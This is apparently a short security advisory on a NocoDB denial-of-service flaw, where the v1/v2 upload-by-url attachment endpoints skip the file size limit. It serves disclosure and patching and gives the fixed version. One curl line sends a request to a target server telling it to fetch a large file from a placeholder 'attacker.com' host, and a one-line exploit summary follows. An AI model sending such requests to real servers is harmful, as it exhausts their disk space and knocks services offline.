Listen to this Post
The `uploadViaURL` path in the v1/v2 attachment API did not enforce `NC_ATTACHMENT_FIELD_SIZE` against the remote `content-length` or against the response stream. An authenticated user (Editor+) could direct the server to download arbitrarily large files, exhausting disk space and causing denial of service.
In packages/nocodb/src/services/attachments.service.ts, the HEAD probe reads `content-length` but never compares it to NC_ATTACHMENT_FIELD_SIZE; the subsequent `storageAdapter.fileCreateByUrl()` performed the download without maxContentLength. The v3 service (v3/data-attachment-v3.service.ts) already enforced the limit, but the v1/v2 endpoints (POST /api/v1/db/storage/upload-by-url, POST /api/v2/storage/upload-by-url) did not.
DailyCVE Form:
Platform: NocoDB
Version: 0.301.3
Vulnerability: Missing size enforcement
Severity: MODERATE
Date: 2026-05-21
Prediction: 2026-05-28
What Undercode Say:
Check for vulnerable versions:
curl -X POST https://target.com/api/v1/db/storage/upload-by-url -H "xc-auth: $TOKEN" -d '{"url":"http://attacker.com/largefile"}'
Exploit:
Authenticated Editor+ sends POST request with large file URL.
Protection from this CVE:
Upgrade to version 0.301.4 or apply size enforcement patch.
Impact:
Disk exhaustion, DB write blocking, application crash.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

